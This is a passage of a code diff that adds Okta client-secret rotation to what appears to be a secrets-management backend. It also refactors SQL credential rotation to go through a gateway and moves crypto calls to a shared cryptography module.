+   */
+  const credentialExists = async (secretId: string): Promise<boolean> => {
+    const instanceUrl = await getOktaInstanceUrl(connection);
+
+    try {
+      const { data } = await request.get<TOktaClientSecret>(
+        `${instanceUrl}/api/v1/apps/${clientId}/credentials/secrets/${secretId}`,
+        {
+          headers: {
+            Accept: "application/json",
+            Authorization: `SSWS ${connection.credentials.apiToken}`
+          }
+        }
+      );
+
+      return data.id === secretId;
+    } catch (_) {
+      return false;
+    }
+  };
+
+  /**
+   * Revokes a client secret from the Okta app using its secretId.
+   * First checks if the credential exists before attempting revocation.
+   */
+  const revokeCredential = async (secretId: string) => {
+    // Check if credential exists before attempting revocation
+    const exists = await credentialExists(secretId);
+    if (!exists) {
+      return; // Credential doesn't exist, nothing to revoke
+    }
+
+    const instanceUrl = await getOktaInstanceUrl(connection);
+
+    try {
+      // First deactivate the secret
+      await request.post(
+        `${instanceUrl}/api/v1/apps/${clientId}/credentials/secrets/${secretId}/lifecycle/deactivate`,
+        undefined,
+        {
+          headers: {
+            Authorization: `SSWS ${connection.credentials.apiToken}`
+          }
+        }
+      );
+
+      // Then delete it
+      await request.delete(`${instanceUrl}/api/v1/apps/${clientId}/credentials/secrets/${secretId}`, {
+        headers: {
+          Authorization: `SSWS ${connection.credentials.apiToken}`
+        }
+      });
+    } catch (error: unknown) {
+      if (
+        error instanceof AxiosError &&
+        error.response?.data &&
+        isOktaErrorResponse(error.response.data) &&
+        error.response.data.errorCode === "E0000001"
+      ) {
+        // If this is the last secret, we cannot revoke it
+        return;
+      }
+
+      throw new BadRequestError({
+        message: `Failed to remove client secret with secretId ${secretId} from app ${clientId}: ${createErrorMessage(error)}`
+      });
+    }
+  };
+
+  /**
+   * Issues a new set of credentials.
+   */
+  const issueCredentials: TRotationFactoryIssueCredentials<TOktaClientSecretRotationGeneratedCredentials> = async (
+    callback
+  ) => {
+    const credentials = await $rotateClientSecret();
+    return callback(credentials);
+  };
+
+  /**
+   * Revokes a list of credentials.
+   */
+  const revokeCredentials: TRotationFactoryRevokeCredentials<TOktaClientSecretRotationGeneratedCredentials> = async (
+    credentials,
+    callback
+  ) => {
+    if (!credentials?.length) return callback();
+
+    for (const { secretId } of credentials) {
+      await revokeCredential(secretId);
+      await delayMs(DELAY_MS);
+    }
+    return callback();
+  };
+
+  /**
+   * Rotates credentials by issuing new ones and revoking the old.
+   */
+  const rotateCredentials: TRotationFactoryRotateCredentials<TOktaClientSecretRotationGeneratedCredentials> = async (
+    oldCredentials,
+    callback,
+    activeCredentials
+  ) => {
+    // Since in Okta you can only have a maximum of 2 secrets at a time, we must delete any other secret besides the current one PRIOR to generating the second secret
+    if (oldCredentials?.secretId) {
+      await revokeCredential(oldCredentials.secretId);
+    } else if (activeCredentials) {
+      // On the first rotation oldCredentials won't be set so we must find the second secret manually
+      const secrets = await $listClientSecrets();
+
+      if (secrets.length > 1) {
+        const nonActiveSecret = secrets.find((secret) => secret.id !== activeCredentials.secretId);
+        if (nonActiveSecret) {
+          await revokeCredential(nonActiveSecret.id);
+        }
+      }
+    }
+
+    const newCredentials = await $rotateClientSecret();
+    return callback(newCredentials);
+  };
+
+  /**
+   * Maps the generated credentials into the secret payload format.
+   */
+  const getSecretsPayload: TRotationFactoryGetSecretsPayload<TOktaClientSecretRotationGeneratedCredentials> = ({
+    clientSecret
+  }) => [
+    { key: secretsMapping.clientId, value: clientId },
+    { key: secretsMapping.clientSecret, value: clientSecret }
+  ];
+
+  return {
+    issueCredentials,
+    revokeCredentials,
+    rotateCredentials,
+    getSecretsPayload
+  };
+};

backend/src/ee/services/secret-rotation-v2/okta-client-secret/okta-client-secret-rotation-schemas.ts

@@ -0,0 +1,68 @@
+import { z } from "zod";
+
+import { SecretRotation } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-enums";
+import {
+  BaseCreateSecretRotationSchema,
+  BaseSecretRotationSchema,
+  BaseUpdateSecretRotationSchema
+} from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-schemas";
+import { SecretRotations } from "@app/lib/api-docs";
+import { SecretNameSchema } from "@app/server/lib/schemas";
+import { AppConnection } from "@app/services/app-connection/app-connection-enums";
+
+export const OktaClientSecretRotationGeneratedCredentialsSchema = z
+  .object({
+    clientId: z.string(),
+    clientSecret: z.string(),
+    secretId: z.string()
+  })
+  .array()
+  .min(1)
+  .max(2);
+
+const OktaClientSecretRotationParametersSchema = z.object({
+  clientId: z
+    .string()
+    .trim()
+    .min(1, "Client ID Required")
+    .describe(SecretRotations.PARAMETERS.OKTA_CLIENT_SECRET.clientId)
+});
+
+const OktaClientSecretRotationSecretsMappingSchema = z.object({
+  clientId: SecretNameSchema.describe(SecretRotations.SECRETS_MAPPING.OKTA_CLIENT_SECRET.clientId),
+  clientSecret: SecretNameSchema.describe(SecretRotations.SECRETS_MAPPING.OKTA_CLIENT_SECRET.clientSecret)
+});
+
+export const OktaClientSecretRotationTemplateSchema = z.object({
+  secretsMapping: z.object({
+    clientId: z.string(),
+    clientSecret: z.string()
+  })
+});
+
+export const OktaClientSecretRotationSchema = BaseSecretRotationSchema(SecretRotation.OktaClientSecret).extend({
+  type: z.literal(SecretRotation.OktaClientSecret),
+  parameters: OktaClientSecretRotationParametersSchema,
+  secretsMapping: OktaClientSecretRotationSecretsMappingSchema
+});
+
+export const CreateOktaClientSecretRotationSchema = BaseCreateSecretRotationSchema(
+  SecretRotation.OktaClientSecret
+).extend({
+  parameters: OktaClientSecretRotationParametersSchema,
+  secretsMapping: OktaClientSecretRotationSecretsMappingSchema
+});
+
+export const UpdateOktaClientSecretRotationSchema = BaseUpdateSecretRotationSchema(
+  SecretRotation.OktaClientSecret
+).extend({
+  parameters: OktaClientSecretRotationParametersSchema.optional(),
+  secretsMapping: OktaClientSecretRotationSecretsMappingSchema.optional()
+});
+
+export const OktaClientSecretRotationListItemSchema = z.object({
+  name: z.literal("Okta Client Secret"),
+  connection: z.literal(AppConnection.Okta),
+  type: z.literal(SecretRotation.OktaClientSecret),
+  template: OktaClientSecretRotationTemplateSchema
+});

backend/src/ee/services/secret-rotation-v2/okta-client-secret/okta-client-secret-rotation-types.ts

@@ -0,0 +1,40 @@
+import { z } from "zod";
+
+import { TOktaConnection } from "@app/services/app-connection/okta";
+
+import {
+  CreateOktaClientSecretRotationSchema,
+  OktaClientSecretRotationGeneratedCredentialsSchema,
+  OktaClientSecretRotationListItemSchema,
+  OktaClientSecretRotationSchema
+} from "./okta-client-secret-rotation-schemas";
+
+export type TOktaClientSecretRotation = z.infer<typeof OktaClientSecretRotationSchema>;
+
+export type TOktaClientSecretRotationInput = z.infer<typeof CreateOktaClientSecretRotationSchema>;
+
+export type TOktaClientSecretRotationListItem = z.infer<typeof OktaClientSecretRotationListItemSchema>;
+
+export type TOktaClientSecretRotationWithConnection = TOktaClientSecretRotation & {
+  connection: TOktaConnection;
+};
+
+export type TOktaClientSecretRotationGeneratedCredentials = z.infer<
+  typeof OktaClientSecretRotationGeneratedCredentialsSchema
+>;
+
+export interface TOktaClientSecretRotationParameters {
+  clientId: string;
+  secretId: string;
+}
+
+export interface TOktaClientSecretRotationSecretsMapping {
+  clientId: string;
+  clientSecret: string;
+  secretId: string;
+}
+
+export interface TOktaClientSecret {
+  id: string;
+  client_secret: string;
+}

backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-enums.ts

@@ -6,7 +6,8 @@ export enum SecretRotation {
   Auth0ClientSecret = "auth0-client-secret",
   AzureClientSecret = "azure-client-secret",
   AwsIamUserSecret = "aws-iam-user-secret",
-  LdapPassword = "ldap-password"
+  LdapPassword = "ldap-password",
+  OktaClientSecret = "okta-client-secret"
 }
 
 export enum SecretRotationStatus {

backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-fns.ts

@@ -10,6 +10,7 @@ import { AZURE_CLIENT_SECRET_ROTATION_LIST_OPTION } from "./azure-client-secret"
 import { LDAP_PASSWORD_ROTATION_LIST_OPTION, TLdapPasswordRotation } from "./ldap-password";
 import { MSSQL_CREDENTIALS_ROTATION_LIST_OPTION } from "./mssql-credentials";
 import { MYSQL_CREDENTIALS_ROTATION_LIST_OPTION } from "./mysql-credentials";
+import { OKTA_CLIENT_SECRET_ROTATION_LIST_OPTION } from "./okta-client-secret";
 import { ORACLEDB_CREDENTIALS_ROTATION_LIST_OPTION } from "./oracledb-credentials";
 import { POSTGRES_CREDENTIALS_ROTATION_LIST_OPTION } from "./postgres-credentials";
 import { SecretRotation, SecretRotationStatus } from "./secret-rotation-v2-enums";
@@ -30,7 +31,8 @@ const SECRET_ROTATION_LIST_OPTIONS: Record<SecretRotation, TSecretRotationV2List
   [SecretRotation.Auth0ClientSecret]: AUTH0_CLIENT_SECRET_ROTATION_LIST_OPTION,
   [SecretRotation.AzureClientSecret]: AZURE_CLIENT_SECRET_ROTATION_LIST_OPTION,
   [SecretRotation.AwsIamUserSecret]: AWS_IAM_USER_SECRET_ROTATION_LIST_OPTION,
-  [SecretRotation.LdapPassword]: LDAP_PASSWORD_ROTATION_LIST_OPTION
+  [SecretRotation.LdapPassword]: LDAP_PASSWORD_ROTATION_LIST_OPTION,
+  [SecretRotation.OktaClientSecret]: OKTA_CLIENT_SECRET_ROTATION_LIST_OPTION
 };
 
 export const listSecretRotationOptions = () => {

backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-maps.ts

@@ -9,7 +9,8 @@ export const SECRET_ROTATION_NAME_MAP: Record<SecretRotation, string> = {
   [SecretRotation.Auth0ClientSecret]: "Auth0 Client Secret",
   [SecretRotation.AzureClientSecret]: "Azure Client Secret",
   [SecretRotation.AwsIamUserSecret]: "AWS IAM User Secret",
-  [SecretRotation.LdapPassword]: "LDAP Password"
+  [SecretRotation.LdapPassword]: "LDAP Password",
+  [SecretRotation.OktaClientSecret]: "Okta Client Secret"
 };
 
 export const SECRET_ROTATION_CONNECTION_MAP: Record<SecretRotation, AppConnection> = {
@@ -20,5 +21,6 @@ export const SECRET_ROTATION_CONNECTION_MAP: Record<SecretRotation, AppConnectio
   [SecretRotation.Auth0ClientSecret]: AppConnection.Auth0,
   [SecretRotation.AzureClientSecret]: AppConnection.AzureClientSecrets,
   [SecretRotation.AwsIamUserSecret]: AppConnection.AWS,
-  [SecretRotation.LdapPassword]: AppConnection.LDAP
+  [SecretRotation.LdapPassword]: AppConnection.LDAP,
+  [SecretRotation.OktaClientSecret]: AppConnection.Okta
 };

backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-service.ts

@@ -4,6 +4,7 @@ import isEqual from "lodash.isequal";
 
 import { SecretType, TableName } from "@app/db/schemas";
 import { EventType, TAuditLogServiceFactory } from "@app/ee/services/audit-log/audit-log-types";
+import { TGatewayServiceFactory } from "@app/ee/services/gateway/gateway-service";
 import { TLicenseServiceFactory } from "@app/ee/services/license/license-service";
 import { hasSecretReadValueOrDescribePermission } from "@app/ee/services/permission/permission-fns";
 import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types";
@@ -82,6 +83,7 @@ import { TSecretVersionV2DALFactory } from "@app/services/secret-v2-bridge/secre
 import { TSecretVersionV2TagDALFactory } from "@app/services/secret-v2-bridge/secret-version-tag-dal";
 
 import { awsIamUserSecretRotationFactory } from "./aws-iam-user-secret/aws-iam-user-secret-rotation-fns";
+import { oktaClientSecretRotationFactory } from "./okta-client-secret/okta-client-secret-rotation-fns";
 import { TSecretRotationV2DALFactory } from "./secret-rotation-v2-dal";
 
 export type TSecretRotationV2ServiceFactoryDep = {
@@ -107,6 +109,7 @@ export type TSecretRotationV2ServiceFactoryDep = {
   queueService: Pick<TQueueServiceFactory, "queuePg">;
   appConnectionDAL: Pick<TAppConnectionDALFactory, "findById" | "update" | "updateById">;
   folderCommitService: Pick<TFolderCommitServiceFactory, "createCommit">;
+  gatewayService: Pick<TGatewayServiceFactory, "fnGetGatewayClientTlsByGatewayId">;
 };
 
 export type TSecretRotationV2ServiceFactory = ReturnType<typeof secretRotationV2ServiceFactory>;
@@ -126,7 +129,8 @@ const SECRET_ROTATION_FACTORY_MAP: Record<SecretRotation, TRotationFactoryImplem
   [SecretRotation.Auth0ClientSecret]: auth0ClientSecretRotationFactory as TRotationFactoryImplementation,
   [SecretRotation.AzureClientSecret]: azureClientSecretRotationFactory as TRotationFactoryImplementation,
   [SecretRotation.AwsIamUserSecret]: awsIamUserSecretRotationFactory as TRotationFactoryImplementation,
-  [SecretRotation.LdapPassword]: ldapPasswordRotationFactory as TRotationFactoryImplementation
+  [SecretRotation.LdapPassword]: ldapPasswordRotationFactory as TRotationFactoryImplementation,
+  [SecretRotation.OktaClientSecret]: oktaClientSecretRotationFactory as TRotationFactoryImplementation
 };
 
 export const secretRotationV2ServiceFactory = ({
@@ -148,7 +152,8 @@ export const secretRotationV2ServiceFactory = ({
   keyStore,
   queueService,
   folderCommitService,
-  appConnectionDAL
+  appConnectionDAL,
+  gatewayService
 }: TSecretRotationV2ServiceFactoryDep) => {
   const $queueSendSecretRotationStatusNotification = async (secretRotation: TSecretRotationV2Raw) => {
     const appCfg = getConfig();
@@ -461,7 +466,8 @@ export const secretRotationV2ServiceFactory = ({
         rotationInterval: payload.rotationInterval
       } as TSecretRotationV2WithConnection,
       appConnectionDAL,
-      kmsService
+      kmsService,
+      gatewayService
     );
 
     // even though we have a db constraint we want to check before any rotation of credentials is attempted
@@ -824,7 +830,8 @@ export const secretRotationV2ServiceFactory = ({
           connection: appConnection
         } as TSecretRotationV2WithConnection,
         appConnectionDAL,
-        kmsService
+        kmsService,
+        gatewayService
       );
 
       const generatedCredentials = await decryptSecretRotationCredentials({
@@ -907,7 +914,8 @@ export const secretRotationV2ServiceFactory = ({
           connection: appConnection
         } as TSecretRotationV2WithConnection,
         appConnectionDAL,
-        kmsService
+        kmsService,
+        gatewayService
       );
 
       const updatedRotation = await rotationFactory.rotateCredentials(

backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-types.ts

@@ -1,4 +1,5 @@
 import { AuditLogInfo } from "@app/ee/services/audit-log/audit-log-types";
+import { TGatewayServiceFactory } from "@app/ee/services/gateway/gateway-service";
 import { TSqlCredentialsRotationGeneratedCredentials } from "@app/ee/services/secret-rotation-v2/shared/sql-credentials/sql-credentials-rotation-types";
 import { OrderByDirection } from "@app/lib/types";
 import { TAppConnectionDALFactory } from "@app/services/app-connection/app-connection-dal";
@@ -45,6 +46,13 @@ import {
   TMySqlCredentialsRotationListItem,
   TMySqlCredentialsRotationWithConnection
 } from "./mysql-credentials";
+import {
+  TOktaClientSecretRotation,
+  TOktaClientSecretRotationGeneratedCredentials,
+  TOktaClientSecretRotationInput,
+  TOktaClientSecretRotationListItem,
+  TOktaClientSecretRotationWithConnection
+} from "./okta-client-secret";
 import {
   TOracleDBCredentialsRotation,
   TOracleDBCredentialsRotationInput,
@@ -68,7 +76,8 @@ export type TSecretRotationV2 =
   | TAuth0ClientSecretRotation
   | TAzureClientSecretRotation
   | TLdapPasswordRotation
-  | TAwsIamUserSecretRotation;
+  | TAwsIamUserSecretRotation
+  | TOktaClientSecretRotation;
 
 export type TSecretRotationV2WithConnection =
   | TPostgresCredentialsRotationWithConnection
@@ -78,14 +87,16 @@ export type TSecretRotationV2WithConnection =
   | TAuth0ClientSecretRotationWithConnection
   | TAzureClientSecretRotationWithConnection
   | TLdapPasswordRotationWithConnection
-  | TAwsIamUserSecretRotationWithConnection;
+  | TAwsIamUserSecretRotationWithConnection
+  | TOktaClientSecretRotationWithConnection;
 
 export type TSecretRotationV2GeneratedCredentials =
   | TSqlCredentialsRotationGeneratedCredentials
   | TAuth0ClientSecretRotationGeneratedCredentials
   | TAzureClientSecretRotationGeneratedCredentials
   | TLdapPasswordRotationGeneratedCredentials
-  | TAwsIamUserSecretRotationGeneratedCredentials;
+  | TAwsIamUserSecretRotationGeneratedCredentials
+  | TOktaClientSecretRotationGeneratedCredentials;
 
 export type TSecretRotationV2Input =
   | TPostgresCredentialsRotationInput
@@ -95,7 +106,8 @@ export type TSecretRotationV2Input =
   | TAuth0ClientSecretRotationInput
   | TAzureClientSecretRotationInput
   | TLdapPasswordRotationInput
-  | TAwsIamUserSecretRotationInput;
+  | TAwsIamUserSecretRotationInput
+  | TOktaClientSecretRotationInput;
 
 export type TSecretRotationV2ListItem =
   | TPostgresCredentialsRotationListItem
@@ -105,7 +117,8 @@ export type TSecretRotationV2ListItem =
   | TAuth0ClientSecretRotationListItem
   | TAzureClientSecretRotationListItem
   | TLdapPasswordRotationListItem
-  | TAwsIamUserSecretRotationListItem;
+  | TAwsIamUserSecretRotationListItem
+  | TOktaClientSecretRotationListItem;
 
 export type TSecretRotationV2TemporaryParameters = TLdapPasswordRotationInput["temporaryParameters"] | undefined;
 
@@ -239,7 +252,8 @@ export type TRotationFactory<
 > = (
   secretRotation: T,
   appConnectionDAL: Pick<TAppConnectionDALFactory, "findById" | "update" | "updateById">,
-  kmsService: Pick<TKmsServiceFactory, "createCipherPairWithDataKey">
+  kmsService: Pick<TKmsServiceFactory, "createCipherPairWithDataKey">,
+  gatewayService: Pick<TGatewayServiceFactory, "fnGetGatewayClientTlsByGatewayId">
 ) => {
   issueCredentials: TRotationFactoryIssueCredentials<C, P>;
   revokeCredentials: TRotationFactoryRevokeCredentials<C>;

backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-union-schema.ts

@@ -6,6 +6,7 @@ import { AzureClientSecretRotationSchema } from "@app/ee/services/secret-rotatio
 import { LdapPasswordRotationSchema } from "@app/ee/services/secret-rotation-v2/ldap-password";
 import { MsSqlCredentialsRotationSchema } from "@app/ee/services/secret-rotation-v2/mssql-credentials";
 import { MySqlCredentialsRotationSchema } from "@app/ee/services/secret-rotation-v2/mysql-credentials";
+import { OktaClientSecretRotationSchema } from "@app/ee/services/secret-rotation-v2/okta-client-secret";
 import { OracleDBCredentialsRotationSchema } from "@app/ee/services/secret-rotation-v2/oracledb-credentials";
 import { PostgresCredentialsRotationSchema } from "@app/ee/services/secret-rotation-v2/postgres-credentials";
 
@@ -17,5 +18,6 @@ export const SecretRotationV2Schema = z.discriminatedUnion("type", [
   Auth0ClientSecretRotationSchema,
   AzureClientSecretRotationSchema,
   LdapPasswordRotationSchema,
-  AwsIamUserSecretRotationSchema
+  AwsIamUserSecretRotationSchema,
+  OktaClientSecretRotationSchema
 ]);

backend/src/ee/services/secret-rotation-v2/shared/sql-credentials/sql-credentials-rotation-fns.ts

@@ -1,3 +1,5 @@
+import { Knex } from "knex";
+
 import {
   TRotationFactory,
   TRotationFactoryGetSecretsPayload,
@@ -5,7 +7,10 @@ import {
   TRotationFactoryRevokeCredentials,
   TRotationFactoryRotateCredentials
 } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-types";
-import { getSqlConnectionClient, SQL_CONNECTION_ALTER_LOGIN_STATEMENT } from "@app/services/app-connection/shared/sql";
+import {
+  executeWithPotentialGateway,
+  SQL_CONNECTION_ALTER_LOGIN_STATEMENT
+} from "@app/services/app-connection/shared/sql";
 
 import { generatePassword } from "../utils";
 import {
@@ -30,7 +35,7 @@ const redactPasswords = (e: unknown, credentials: TSqlCredentialsRotationGenerat
 export const sqlCredentialsRotationFactory: TRotationFactory<
   TSqlCredentialsRotationWithConnection,
   TSqlCredentialsRotationGeneratedCredentials
-> = (secretRotation) => {
+> = (secretRotation, _appConnectionDAL, _kmsService, gatewayService) => {
   const {
     connection,
     parameters: { username1, username2 },
@@ -38,29 +43,38 @@ export const sqlCredentialsRotationFactory: TRotationFactory<
     secretsMapping
   } = secretRotation;
 
-  const $validateCredentials = async (credentials: TSqlCredentialsRotationGeneratedCredentials[number]) => {
-    const client = await getSqlConnectionClient({
-      ...connection,
-      credentials: {
-        ...connection.credentials,
-        ...credentials
-      }
-    });
+  const executeOperation = <T>(
+    operation: (client: Knex) => Promise<T>,
+    credentialsOverride?: TSqlCredentialsRotationGeneratedCredentials[number]
+  ) => {
+    const finalCredentials = {
+      ...connection.credentials,
+      ...credentialsOverride
+    };
 
+    return executeWithPotentialGateway(
+      {
+        ...connection,
+        credentials: finalCredentials
+      },
+      gatewayService,
+      (client) => operation(client)
+    );
+  };
+
+  const $validateCredentials = async (credentials: TSqlCredentialsRotationGeneratedCredentials[number]) => {
     try {
-      await client.raw("SELECT 1");
+      await executeOperation(async (client) => {
+        await client.raw("SELECT 1");
+      }, credentials);
     } catch (error) {
       throw new Error(redactPasswords(error, [credentials]));
-    } finally {
-      await client.destroy();
     }
   };
 
   const issueCredentials: TRotationFactoryIssueCredentials<TSqlCredentialsRotationGeneratedCredentials> = async (
     callback
   ) => {
-    const client = await getSqlConnectionClient(connection);
-
     // For SQL, since we get existing users, we change both their passwords
     // on issue to invalidate their existing passwords
     const credentialsSet = [
@@ -69,15 +83,15 @@ export const sqlCredentialsRotationFactory: TRotationFactory<
     ];
 
     try {
-      await client.transaction(async (tx) => {
-        for await (const credentials of credentialsSet) {
-          await tx.raw(...SQL_CONNECTION_ALTER_LOGIN_STATEMENT[connection.app](credentials));
-        }
+      await executeOperation(async (client) => {
+        await client.transaction(async (tx) => {
+          for await (const credentials of credentialsSet) {
+            await tx.raw(...SQL_CONNECTION_ALTER_LOGIN_STATEMENT[connection.app](credentials));
+          }
+        });
       });
     } catch (error) {
       throw new Error(redactPasswords(error, credentialsSet));
-    } finally {
-      await client.destroy();
     }
 
     for await (const credentials of credentialsSet) {
@@ -91,21 +105,19 @@ export const sqlCredentialsRotationFactory: TRotationFactory<
     credentialsToRevoke,
     callback
   ) => {
-    const client = await getSqlConnectionClient(connection);
-
     const revokedCredentials = credentialsToRevoke.map(({ username }) => ({ username, password: generatePassword() }));
 
     try {
-      await client.transaction(async (tx) => {
-        for await (const credentials of revokedCredentials) {
-          // invalidate previous passwords
-          await tx.raw(...SQL_CONNECTION_ALTER_LOGIN_STATEMENT[connection.app](credentials));
-        }
+      await executeOperation(async (client) => {
+        await client.transaction(async (tx) => {
+          for await (const credentials of revokedCredentials) {
+            // invalidate previous passwords
+            await tx.raw(...SQL_CONNECTION_ALTER_LOGIN_STATEMENT[connection.app](credentials));
+          }
+        });
       });
     } catch (error) {
       throw new Error(redactPasswords(error, revokedCredentials));
-    } finally {
-      await client.destroy();
     }
 
     return callback();
@@ -115,17 +127,15 @@ export const sqlCredentialsRotationFactory: TRotationFactory<
     _,
     callback
   ) => {
-    const client = await getSqlConnectionClient(connection);
-
     // generate new password for the next active user
     const credentials = { username: activeIndex === 0 ? username2 : username1, password: generatePassword() };
 
     try {
-      await client.raw(...SQL_CONNECTION_ALTER_LOGIN_STATEMENT[connection.app](credentials));
+      await executeOperation(async (client) => {
+        await client.raw(...SQL_CONNECTION_ALTER_LOGIN_STATEMENT[connection.app](credentials));
+      });
     } catch (error) {
       throw new Error(redactPasswords(error, [credentials]));
-    } finally {
-      await client.destroy();
     }
 
     await $validateCredentials(credentials);

backend/src/ee/services/secret-rotation-v2/shared/utils/index.ts

@@ -1,4 +1,4 @@
-import { randomInt } from "crypto";
+import { crypto } from "@app/lib/crypto/cryptography";
 
 type TPasswordRequirements = {
   length: number;
@@ -39,7 +39,7 @@ export const generatePassword = (passwordRequirements?: TPasswordRequirements) =
       parts.push(
         ...Array(required.lowercase)
           .fill(0)
-          .map(() => chars.lowercase[randomInt(chars.lowercase.length)])
+          .map(() => chars.lowercase[crypto.randomInt(chars.lowercase.length)])
       );
     }
 
@@ -47,7 +47,7 @@ export const generatePassword = (passwordRequirements?: TPasswordRequirements) =
       parts.push(
         ...Array(required.uppercase)
           .fill(0)
-          .map(() => chars.uppercase[randomInt(chars.uppercase.length)])
+          .map(() => chars.uppercase[crypto.randomInt(chars.uppercase.length)])
       );
     }
 
@@ -55,7 +55,7 @@ export const generatePassword = (passwordRequirements?: TPasswordRequirements) =
       parts.push(
         ...Array(required.digits)
           .fill(0)
-          .map(() => chars.digits[randomInt(chars.digits.length)])
+          .map(() => chars.digits[crypto.randomInt(chars.digits.length)])
       );
     }
 
@@ -63,7 +63,7 @@ export const generatePassword = (passwordRequirements?: TPasswordRequirements) =
       parts.push(
         ...Array(required.symbols)
           .fill(0)
-          .map(() => chars.symbols[randomInt(chars.symbols.length)])
+          .map(() => chars.symbols[crypto.randomInt(chars.symbols.length)])
       );
     }
 
@@ -78,12 +78,12 @@ export const generatePassword = (passwordRequirements?: TPasswordRequirements) =
     parts.push(
       ...Array(remainingLength)
         .fill(0)
-        .map(() => allowedChars[randomInt(allowedChars.length)])
+        .map(() => allowedChars[crypto.randomInt(allowedChars.length)])
     );
 
     // shuffle the array to mix up the characters
     for (let i = parts.length - 1; i > 0; i -= 1) {
-      const j = randomInt(i + 1);
+      const j = crypto.randomInt(i + 1);
       [parts[i], parts[j]] = [parts[j], parts[i]];
     }
 

backend/src/ee/services/secret-rotation/secret-rotation-queue/secret-rotation-queue.ts

@@ -6,8 +6,9 @@ import {
 } from "@aws-sdk/client-iam";
 
 import { SecretType } from "@app/db/schemas";
+import { CustomAWSHasher } from "@app/lib/aws/hashing";
 import { getConfig } from "@app/lib/config/env";
-import { encryptSymmetric128BitHexKeyUTF8 } from "@app/lib/crypto/encryption";
+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
 import { daysToMillisecond, secondsToMillis } from "@app/lib/dates";
 import { NotFoundError } from "@app/lib/errors";
 import { logger } from "@app/lib/logger";
@@ -117,6 +118,7 @@ export const secretRotationQueueFactory = ({
   queue.start(QueueName.SecretRotation, async (job) => {
     const { rotationId } = job.data;
     const appCfg = getConfig();
+
     logger.info(`secretRotationQueue.process: [rotationDocument=${rotationId}]`);
     const secretRotation = await secretRotationDAL.findById(rotationId);
     const rotationProvider = rotationTemplates.find(({ name }) => name === secretRotation?.provider);
@@ -225,6 +227,8 @@ export const secretRotationQueueFactory = ({
       if (provider.template.type === TProviderFunctionTypes.AWS) {
         if (provider.template.client === TAwsProviderSystems.IAM) {
           const client = new IAMClient({
+            useFipsEndpoint: crypto.isFipsModeEnabled(),
+            sha256: CustomAWSHasher,
             region: newCredential.inputs.manager_user_aws_region as string,
             credentials: {
               accessKeyId: newCredential.inputs.manager_user_access_key as string,
@@ -365,15 +369,22 @@ export const secretRotationQueueFactory = ({
           throw new NotFoundError({
             message: `Project bot not found for project with ID '${secretRotation.projectId}'`
           });
+
         const encryptedSecrets = rotationOutputs.map(({ key: outputKey, secretId }) => ({
           secretId,
-          value: encryptSymmetric128BitHexKeyUTF8(
-            typeof newCredential.outputs[outputKey] === "object"
-              ? JSON.stringify(newCredential.outputs[outputKey])
-              : String(newCredential.outputs[outputKey]),
-            botKey
-          )
+          value: crypto
+            .encryption()
+            .symmetric()
+            .encrypt({
+              plaintext:
+                typeof newCredential.outputs[outputKey] === "object"
+                  ? JSON.stringify(newCredential.outputs[outputKey])
+                  : String(newCredential.outputs[outputKey]),
+              key: botKey,
+              keySize: SymmetricKeySize.Bits128
+            })
         }));
+
         // map the final values to output keys in the board
         await secretRotationDAL.transaction(async (tx) => {
           await secretRotationDAL.updateById(

backend/src/ee/services/secret-rotation/secret-rotation-service.ts

@@ -2,7 +2,7 @@ import { ForbiddenError, subject } from "@casl/ability";
 import Ajv from "ajv";
 
 import { ProjectVersion, TableName } from "@app/db/schemas";
-import { decryptSymmetric128BitHexKeyUTF8 } from "@app/lib/crypto/encryption";
+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
 import { BadRequestError, NotFoundError } from "@app/lib/errors";
 import { TProjectPermission } from "@app/lib/types";
 import { TKmsServiceFactory } from "@app/services/kms/kms-service";
@@ -227,6 +227,7 @@ export const secretRotationServiceFactory = ({
 
     if (!botKey) throw new NotFoundError({ message: `Project bot not found for project with ID '${projectId}'` });
     const docs = await secretRotationDAL.find({ projectId });
+
     return docs.map((el) => ({
       ...el,
       outputs: el.outputs.map((output) => ({
@@ -234,11 +235,12 @@ export const secretRotationServiceFactory = ({
         secret: {
           id: output.secret.id,
           version: output.secret.version,
-          secretKey: decryptSymmetric128BitHexKeyUTF8({
+          secretKey: crypto.encryption().symmetric().decrypt({
             ciphertext: output.secret.secretKeyCiphertext,
             iv: output.secret.secretKeyIV,
             tag: output.secret.secretKeyTag,
-            key: botKey
+            key: botKey,
+            keySize: SymmetricKeySize.Bits128
           })
         }
       }))

backend/src/ee/services/secret-scanning-v2/bitbucket/bitbucket-secret-scanning-service.ts

@@ -1,8 +1,7 @@
-import crypto from "crypto";
-
 import { TSecretScanningV2DALFactory } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-dal";
 import { SecretScanningDataSource } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-enums";
 import { TSecretScanningV2QueueServiceFactory } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-queue";
+import { crypto } from "@app/lib/crypto";
 import { logger } from "@app/lib/logger";
 import { TKmsServiceFactory } from "@app/services/kms/kms-service";
 import { KmsDataKey } from "@app/services/kms/kms-types";
@@ -67,7 +66,7 @@ export const bitbucketSecretScanningService = (
 
     const credentials = JSON.parse(decryptedCredentials.toString()) as TBitbucketDataSourceCredentials;
 
-    const hmac = crypto.createHmac("sha256", credentials.webhookSecret);
+    const hmac = crypto.nativeCrypto.createHmac("sha256", credentials.webhookSecret);
     hmac.update(bodyString);
     const calculatedSignature = hmac.digest("hex");
 

backend/src/ee/services/secret-scanning-v2/secret-scanning-v2-queue.ts

@@ -567,14 +567,18 @@ export const secretScanningV2QueueServiceFactory = async ({
         const projectMembers = await projectMembershipDAL.findAllProjectMembers(projectId);
         const project = await projectDAL.findById(projectId);
 
-        const projectAdmins = projectMembers.filter((member) =>
-          member.roles.some((role) => role.role === ProjectMembershipRole.Admin)
-        );
+        const recipients = projectMembers.filter((member) => {
+          const isAdmin = member.roles.some((role) => role.role === ProjectMembershipRole.Admin);
